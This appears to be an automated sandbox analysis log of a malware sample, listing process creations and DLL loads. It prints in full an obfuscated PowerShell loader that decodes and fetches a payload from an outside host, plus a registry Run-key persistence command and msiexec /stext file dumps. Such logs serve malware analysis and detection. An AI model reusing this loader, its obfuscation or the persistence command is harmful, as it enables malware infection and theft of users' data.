Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Meta$D,kaTAcc a Abea C sg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Met
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kywjvrv"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\uabbwbgmjcn"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fuomwurowkfkpf"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Meta$D,kaTAcc a Abea C sg Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kywjvrv" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\uabbwbgmjcn" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fuomwurowkfkpf" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)" Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncryptsslp.dll Jump to behavior
